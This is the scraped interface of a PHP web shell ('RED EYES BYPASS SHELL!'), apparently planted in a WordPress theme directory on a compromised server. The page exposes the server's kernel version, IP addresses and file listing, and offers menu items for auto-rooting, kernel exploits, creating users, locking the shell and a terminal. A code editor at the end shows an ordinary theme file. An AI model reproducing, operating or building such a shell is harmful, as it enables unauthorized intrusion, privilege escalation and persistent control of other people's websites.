Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
envo-royal /
extra /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
customizer
[ DIR ]
drwxr-xr-x
customizer-recommend.php
1.21
KB
-rwxr-xr-x
customizer.php
740
B
-rwxr-xr-x
envo-royal-dashboard.php
5.19
KB
-rwxr-xr-x
envo-royal-plugin-install.php
3.57
KB
-rwxr-xr-x
extra.php
22.07
KB
-rwxr-xr-x
woocommerce.php
10.98
KB
-rwxr-xr-x
wp_bootstrap_navwalker.php
24.62
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customizer.php
<?php /** * Envo Royal Theme Customizer * * @package Envo Royal */ $envo_royal_sections = array( 'info', 'demo' ); foreach( $envo_royal_sections as $section ){ require get_template_directory() . '/extra/customizer/' . $section . '.php'; // phpcs:ignore WPThemeReview.CoreFunctionality.FileInclude.FileIncludeFound } function envo_royal_customizer_scripts() { wp_enqueue_style( 'envo-royal-customize',get_template_directory_uri().'/extra/customizer/css/customize.css', '', 'screen' ); wp_enqueue_script( 'envo-royal-customize', get_template_directory_uri() . '/extra/customizer/js/customize.js', array( 'jquery' ), '20170404', true ); } add_action( 'customize_controls_enqueue_scripts', 'envo_royal_customizer_scripts' );
Close